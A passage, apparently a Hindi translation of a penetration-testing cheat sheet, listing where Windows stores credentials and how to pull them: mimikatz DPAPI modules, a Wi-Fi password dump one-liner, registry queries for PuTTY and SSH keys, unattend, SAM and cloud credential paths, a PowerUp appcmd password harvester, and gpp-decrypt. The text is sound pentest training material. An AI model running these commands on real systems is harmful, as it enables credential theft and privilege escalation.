рдбреЗрдЯрд╛ рдкреНрд░реЛрдЯреЗрдХреНрд╢рди рдПрдкреАрдЖрдИ (DPAPI) рдбреЗрдЯрд╛ рдХреЗ рд╕рдордорд┐рдд рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХреЗ рд▓рд┐рдП рдПрдХ рд╡рд┐рдзрд┐ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ, рдЬреЛ рдореБрдЦреНрдп рд░реВрдк рд╕реЗ рд╡рд┐рдВрдбреЛрдЬ рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдо рдХреЗ рднреАрддрд░ рд╕рдордорд┐рдд рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХреЗ рд▓рд┐рдП рдЕрд╕рдордорд┐рдд рдирд┐рдЬреА рдХреБрдВрдЬрд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдпрд╣ рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдпрд╛ рд╕рд┐рд╕реНрдЯрдо рд░рд╣рд╕реНрдп рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИ рдЬреЛ рдПрдВрдЯреНрд░реЙрдкреА рдореЗрдВ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдпреЛрдЧрджрд╛рди рджреЗрддрд╛ рд╣реИред

DPAPI рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд▓реЙрдЧрд┐рди рд░рд╣рд╕реНрдпреЛрдВ рд╕реЗ рдирд┐рдХрд╛рд▓реА рдЧрдИ рд╕рдордорд┐рдд рдХреБрдВрдЬреА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХреБрдВрдЬрд┐рдпреЛрдВ рдХреЗ рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рд╕рд┐рд╕реНрдЯрдо рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХреЗ рдорд╛рдорд▓реЛрдВ рдореЗрдВ, рдпрд╣ рд╕рд┐рд╕реНрдЯрдо рдХреЗ рдбреЛрдореЗрди рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд░рд╣рд╕реНрдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред

DPAPI рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ RSA рдХреБрдВрдЬрд┐рдпрд╛рдБ %APPDATA%\Microsoft\Protect\{SID} рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реЛрддреА рд╣реИрдВ, рдЬрд╣рд╛рдБ {SID} рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд╕реБрд░рдХреНрд╖рд╛ рдкрд╣рдЪрд╛рдирдХрд░реНрддрд╛ рдХрд╛ рдкреНрд░рддрд┐рдирд┐рдзрд┐рддреНрд╡ рдХрд░рддрд╛ рд╣реИред DPAPI рдХреБрдВрдЬреА, рдЬреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рдирд┐рдЬреА рдХреБрдВрдЬрд┐рдпреЛрдВ рдХреЛ рдЙрд╕реА рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рд╕реБрд░рдХреНрд╖рд┐рдд рд░рдЦрдиреЗ рд╡рд╛рд▓реЗ рдорд╛рд╕реНрдЯрд░ рдХреБрдВрдЬреА рдХреЗ рд╕рд╛рде рд╕реНрдерд┐рдд рд╣реЛрддреА рд╣реИ, рдЖрдорддреМрд░ рдкрд░ 64 рдмрд╛рдЗрдЯреНрд╕ рдХреЗ рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рдбреЗрдЯрд╛ рд╕реЗ рдмрдиреА рд╣реЛрддреА рд╣реИред (рдпрд╣ рдзреНрдпрд╛рди рд░рдЦрдирд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рд╣реИ рдХрд┐ рдЗрд╕ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рд╣реИ, рдЬрд┐рд╕рд╕реЗ CMD рдореЗрдВ dir рдХрдорд╛рдВрдб рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЗрд╕рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЛ рд╕реВрдЪреАрдмрджреНрдз рдХрд░рдиреЗ рд╕реЗ рд░реЛрдХрд╛ рдЬрд╛рддрд╛ рд╣реИ, рд╣рд╛рд▓рд╛рдБрдХрд┐ рдЗрд╕реЗ PowerShell рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕реВрдЪреАрдмрджреНрдз рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ)ред

Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\

рдЖрдк mimikatz module dpapi::masterkey рдХреЛ рдЙрдкрдпреБрдХреНрдд рддрд░реНрдХреЛрдВ (/pvk рдпрд╛ /rpc) рдХреЗ рд╕рд╛рде рдЗрд╕рдХрд╛ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рдорд╛рд╕реНрдЯрд░ рдкрд╛рд╕рд╡рд░реНрдб рджреНрд╡рд╛рд░рд╛ рд╕реБрд░рдХреНрд╖рд┐рдд рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдлрд╝рд╛рдЗрд▓реЗрдВ рдЖрдорддреМрд░ рдкрд░ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╕реНрдерд╛рди рдкрд░ рд╣реЛрддреА рд╣реИрдВ:

dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

рдЖрдк mimikatz module dpapi::cred рдХрд╛ рдЙрдкрдпреЛрдЧ рдЙрдЪрд┐рдд /masterkey рдХреЗ рд╕рд╛рде рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдЖрдк sekurlsa::dpapi module рдХреЗ рд╕рд╛рде memory рд╕реЗ рдХрдИ DPAPI masterkeys рдирд┐рдХрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВ (рдпрджрд┐ рдЖрдк root рд╣реИрдВ)ред

{% content-ref url="dpapi-extracting-passwords.md" %} dpapi-extracting-passwords.md {% endcontent-ref %}

PowerShell Credentials

PowerShell credentials рдЕрдХреНрд╕рд░ scripting рдФрд░ рд╕реНрд╡рдЪрд╛рд▓рди рдХрд╛рд░реНрдпреЛрдВ рдХреЗ рд▓рд┐рдП рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЛ рд╕реБрд╡рд┐рдзрд╛рдЬрдирдХ рддрд░реАрдХреЗ рд╕реЗ рд╕реНрдЯреЛрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЬрд╛рддреЗ рд╣реИрдВред рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЛ DPAPI рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕реБрд░рдХреНрд╖рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬрд┐рд╕рдХрд╛ рдЕрд░реНрде рд╣реИ рдХрд┐ рдЗрдиреНрд╣реЗрдВ рдХреЗрд╡рд▓ рдЙрд╕реА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рджреНрд╡рд╛рд░рд╛ рдЙрд╕реА рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ рдЬрд┐рд╕ рдкрд░ рдЗрдиреНрд╣реЗрдВ рдмрдирд╛рдпрд╛ рдЧрдпрд╛ рдерд╛ред

рдПрдХ рдлрд╝рд╛рдЗрд▓ рд╕реЗ PS рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЛ decrypt рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЬрд┐рд╕рдореЗрдВ рдпрд╣ рд╣реИ, рдЖрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username

john

PS C:\htb> $credential.GetNetworkCredential().password

JustAPWD!

рд╡рд╛рдИрдлрд╛рдИ

#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*

Saved RDP Connections

рдЖрдк рдЗрдиреНрд╣реЗрдВ HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
рдФрд░ HKCU\Software\Microsoft\Terminal Server Client\Servers\ рдореЗрдВ рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВред

Recently Run Commands

HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

рд░рд┐рдореЛрдЯ рдбреЗрд╕реНрдХрдЯреЙрдк рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдкреНрд░рдмрдВрдзрдХ

%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings

Use the Mimikatz dpapi::rdg module with appropriate /masterkey to decrypt any .rdg files
рдЖрдк Mimikatz sekurlsa::dpapi рдореЙрдбреНрдпреВрд▓ рдХреЗ рд╕рд╛рде рдореЗрдореЛрд░реА рд╕реЗ рдХрдИ DPAPI рдорд╛рд╕реНрдЯрд░рдХреАрдЬрд╝ рдирд┐рдХрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВред

Sticky Notes

рд▓реЛрдЧ рдЕрдХреНрд╕рд░ Windows рд╡рд░реНрдХрд╕реНрдЯреЗрд╢рдиреЛрдВ рдкрд░ StickyNotes рдРрдк рдХрд╛ рдЙрдкрдпреЛрдЧ рдкрд╛рд╕рд╡рд░реНрдб рдФрд░ рдЕрдиреНрдп рдЬрд╛рдирдХрд╛рд░реА рдХреЛ рд╕рд╣реЗрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдХрд░рддреЗ рд╣реИрдВ, рдпрд╣ рдирд╣реАрдВ realizing рдХрд┐ рдпрд╣ рдПрдХ рдбреЗрдЯрд╛рдмреЗрд╕ рдлрд╝рд╛рдЗрд▓ рд╣реИред рдпрд╣ рдлрд╝рд╛рдЗрд▓ C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite рдкрд░ рд╕реНрдерд┐рдд рд╣реИ рдФрд░ рдЗрд╕реЗ рдЦреЛрдЬрдирд╛ рдФрд░ рдЬрд╛рдВрдЪрдирд╛ рд╣рдореЗрд╢рд╛ рдлрд╛рдпрджреЗрдордВрдж рд╣реЛрддрд╛ рд╣реИред

AppCmd.exe

рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ AppCmd.exe рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдкреБрдирд░реНрдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдкрдХреЛ Administrator рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП рдФрд░ рдЙрдЪреНрдЪ рдЗрдВрдЯреАрдЧреНрд░рд┐рдЯреА рд╕реНрддрд░ рдХреЗ рддрд╣рдд рдЪрд▓рд╛рдирд╛ рдЪрд╛рд╣рд┐рдПред
AppCmd.exe %systemroot%\system32\inetsrv\ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рд╕реНрдерд┐рдд рд╣реИред
рдпрджрд┐ рдпрд╣ рдлрд╝рд╛рдЗрд▓ рдореМрдЬреВрдж рд╣реИ рддреЛ рд╕рдВрднрд╡ рд╣реИ рдХрд┐ рдХреБрдЫ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд┐рдП рдЧрдП рд╣реЛрдВ рдФрд░ рдЙрдиреНрд╣реЗрдВ рдкреБрдирд░реНрдкреНрд░рд╛рдкреНрдд рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХреЗред

This code was extracted from PowerUP:

function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"

# Check if appcmd.exe exists
if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable

# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")

# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {

# Get application pool name
$PoolName = $_

# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd

# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd

# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}

# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {

# Get Virtual Directory Name
$VdirName = $_

# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd

# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd

# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}

# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}

SCClient / SCCM

рдЬрд╛рдВрдЪреЗрдВ рдХрд┐ C:\Windows\CCM\SCClient.exe рдореМрдЬреВрдж рд╣реИ рдпрд╛ рдирд╣реАрдВред
рдЗрдВрд╕реНрдЯреЙрд▓рд░ SYSTEM рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдЪрд▓рд╛рдП рдЬрд╛рддреЗ рд╣реИрдВ, рдХрдИ DLL Sideloading рдХреЗ рдкреНрд░рддрд┐ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рд╣реИрдВ (рдЬрд╛рдирдХрд╛рд░реА https://github.com/enjoiz/Privesc)ред

$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }

рдлрд╝рд╛рдЗрд▓реЗрдВ рдФрд░ рд░рдЬрд┐рд╕реНрдЯреНрд░реНрд░реА (рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕)

рдкреБрдЯреНрдЯреА рдХреНрд░реЗрдбреНрд╕

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

Putty SSH рд╣реЛрд╕реНрдЯ рдХреБрдВрдЬреА

reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\

SSH keys in registry

SSH рдирд┐рдЬреА рдХреБрдВрдЬреА рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдВрдЬреА HKCU\Software\OpenSSH\Agent\Keys рдХреЗ рдЕрдВрджрд░ рд╕рдВрдЧреНрд░рд╣реАрдд рдХреА рдЬрд╛ рд╕рдХрддреА рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рдЖрдкрдХреЛ рдпрд╣ рдЬрд╛рдВрдЪрдирд╛ рдЪрд╛рд╣рд┐рдП рдХрд┐ рдХреНрдпрд╛ рд╡рд╣рд╛рдБ рдХреБрдЫ рджрд┐рд▓рдЪрд╕реНрдк рд╣реИ:

reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'

рдпрджрд┐ рдЖрдк рдЙрд╕ рдкрде рдХреЗ рдЕрдВрджрд░ рдХреЛрдИ рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐ рдкрд╛рддреЗ рд╣реИрдВ, рддреЛ рдпрд╣ рд╢рд╛рдпрдж рдПрдХ рд╕рд╣реЗрдЬрд╛ рдЧрдпрд╛ SSH рдХреБрдВрдЬреА рд╣реЛрдЧреАред рдпрд╣ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рд░реВрдк рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реЛрддреА рд╣реИ рд▓реЗрдХрд┐рди https://github.com/ropnop/windows_sshagent_extract рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЗрд╕реЗ рдЖрд╕рд╛рдиреА рд╕реЗ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред
рдЗрд╕ рддрдХрдиреАрдХ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдпрд╣рд╛рдБ: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/

рдпрджрд┐ ssh-agent рд╕реЗрд╡рд╛ рдЪрд▓ рдирд╣реАрдВ рд░рд╣реА рд╣реИ рдФрд░ рдЖрдк рдЪрд╛рд╣рддреЗ рд╣реИрдВ рдХрд┐ рдпрд╣ рдмреВрдЯ рдкрд░ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рд╢реБрд░реВ рд╣реЛ, рддреЛ рдЪрд▓рд╛рдПрдБ:

Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service

{% hint style="info" %} рдРрд╕рд╛ рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ рдпрд╣ рддрдХрдиреАрдХ рдЕрдм рдорд╛рдиреНрдп рдирд╣реАрдВ рд╣реИред рдореИрдВрдиреЗ рдХреБрдЫ ssh рдХреБрдВрдЬреА рдмрдирд╛рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХреА, рдЙрдиреНрд╣реЗрдВ ssh-add рдХреЗ рд╕рд╛рде рдЬреЛрдбрд╝рд╛ рдФрд░ ssh рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ рдорд╢реАрди рдореЗрдВ рд▓реЙрдЧрд┐рди рдХрд┐рдпрд╛ред рд░рдЬрд┐рд╕реНрдЯреНрд░реА HKCU\Software\OpenSSH\Agent\Keys рдореМрдЬреВрдж рдирд╣реАрдВ рд╣реИ рдФрд░ procmon рдиреЗ рд╡рд┐рд╖рдо рдХреБрдВрдЬреА рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЗ рджреМрд░рд╛рди dpapi.dll рдХреЗ рдЙрдкрдпреЛрдЧ рдХреА рдкрд╣рдЪрд╛рди рдирд╣реАрдВ рдХреАред {% endhint %}

рдЕрдирдЯреЗрдВрдбреЗрдб рдлрд╝рд╛рдЗрд▓реЗрдВ

C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

рдЖрдк рдЗрди рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ metasploit рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рднреА рдЦреЛрдЬ рд╕рдХрддреЗ рд╣реИрдВ: post/windows/gather/enum_unattend

рдЙрджрд╛рд╣рд░рдг рд╕рд╛рдордЧреНрд░реА:

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>

<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>

SAM & SYSTEM рдмреИрдХрдЕрдк

# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

рдХреНрд▓рд╛рдЙрдб рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕

#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json

McAfee SiteList.xml

SiteList.xml рдирд╛рдордХ рдлрд╝рд╛рдЗрд▓ рдХреЗ рд▓рд┐рдП рдЦреЛрдЬреЗрдВ

Cached GPP Pasword

рдПрдХ рд╡рд┐рд╢реЗрд╖рддрд╛ рдкрд╣рд▓реЗ рдЙрдкрд▓рдмреНрдз рдереА рдЬреЛ Group Policy Preferences (GPP) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдорд╢реАрдиреЛрдВ рдХреЗ рдПрдХ рд╕рдореВрд╣ рдкрд░ рдХрд╕реНрдЯрдо рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЦрд╛рддреЛрдВ рдХреЛ рддреИрдирд╛рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рдереАред рд╣рд╛рд▓рд╛рдБрдХрд┐, рдЗрд╕ рд╡рд┐рдзрд┐ рдореЗрдВ рдорд╣рддреНрд╡рдкреВрд░реНрдг рд╕реБрд░рдХреНрд╖рд╛ рдЦрд╛рдорд┐рдпрд╛рдБ рдереАрдВред рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, Group Policy Objects (GPOs), рдЬреЛ SYSVOL рдореЗрдВ XML рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЗ рд░реВрдк рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реЛрддреЗ рд╣реИрдВ, рдХрд┐рд╕реА рднреА рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рджреНрд╡рд╛рд░рд╛ рдкрд╣реБрдБрдЪрд╛ рдЬрд╛ рд╕рдХрддрд╛ рдерд╛ред рджреВрд╕рд░реА рдмрд╛рдд, рдЗрди GPPs рдХреЗ рднреАрддрд░ рдкрд╛рд╕рд╡рд░реНрдб, рдЬреЛ рдПрдХ рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рд░реВрдк рд╕реЗ рдкреНрд░рд▓реЗрдЦрд┐рдд рдбрд┐рдлрд╝реЙрд▓реНрдЯ рдХреБрдВрдЬреА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ AES256 рдХреЗ рд╕рд╛рде рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдП рдЧрдП рдереЗ, рдХрд┐рд╕реА рднреА рдкреНрд░рдорд╛рдгрд┐рдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рджреНрд╡рд╛рд░рд╛ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдП рдЬрд╛ рд╕рдХрддреЗ рдереЗред рдпрд╣ рдПрдХ рдЧрдВрднреАрд░ рдЬреЛрдЦрд┐рдо рдкреНрд░рд╕реНрддреБрдд рдХрд░рддрд╛ рдерд╛, рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕рд╕реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рдЙрдЪреНрдЪрд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рдорд┐рд▓ рд╕рдХрддреА рдереАред

рдЗрд╕ рдЬреЛрдЦрд┐рдо рдХреЛ рдХрдо рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдПрдХ рдлрд╝рдВрдХреНрд╢рди рд╡рд┐рдХрд╕рд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ рдЬреЛ "cpassword" рдлрд╝реАрд▓реНрдб рд╡рд╛рд▓реЗ рд╕реНрдерд╛рдиреАрдп рд░реВрдк рд╕реЗ рдХреИрд╢ рдХрд┐рдП рдЧрдП GPP рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рд╕реНрдХреИрди рдХрд░рддрд╛ рд╣реИ рдЬреЛ рдЦрд╛рд▓реА рдирд╣реАрдВ рд╣реИред рдРрд╕реА рдлрд╝рд╛рдЗрд▓ рдорд┐рд▓рдиреЗ рдкрд░, рдлрд╝рдВрдХреНрд╢рди рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░рддрд╛ рд╣реИ рдФрд░ рдПрдХ рдХрд╕реНрдЯрдо PowerShell рдСрдмреНрдЬреЗрдХреНрдЯ рд▓реМрдЯрд╛рддрд╛ рд╣реИред рдпрд╣ рдСрдмреНрдЬреЗрдХреНрдЯ GPP рдФрд░ рдлрд╝рд╛рдЗрд▓ рдХреЗ рд╕реНрдерд╛рди рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╡рд┐рд╡рд░рдг рд╢рд╛рдорд┐рд▓ рдХрд░рддрд╛ рд╣реИ, рдЬреЛ рдЗрд╕ рд╕реБрд░рдХреНрд╖рд╛ рднреЗрджреНрдпрддрд╛ рдХреА рдкрд╣рдЪрд╛рди рдФрд░ рд╕реБрдзрд╛рд░ рдореЗрдВ рдорджрдж рдХрд░рддрд╛ рд╣реИред

рдЗрди рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЗ рд▓рд┐рдП рдЦреЛрдЬреЗрдВ C:\ProgramData\Microsoft\Group Policy\history рдпрд╛ C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (W Vista рд╕реЗ рдкрд╣рд▓реЗ):

  • Groups.xml
  • Services.xml
  • Scheduledtasks.xml
  • DataSources.xml
  • Printers.xml
  • Drives.xml

cPassword рдХреЛ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП:

#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

Using crackmapexec to get the passwords:
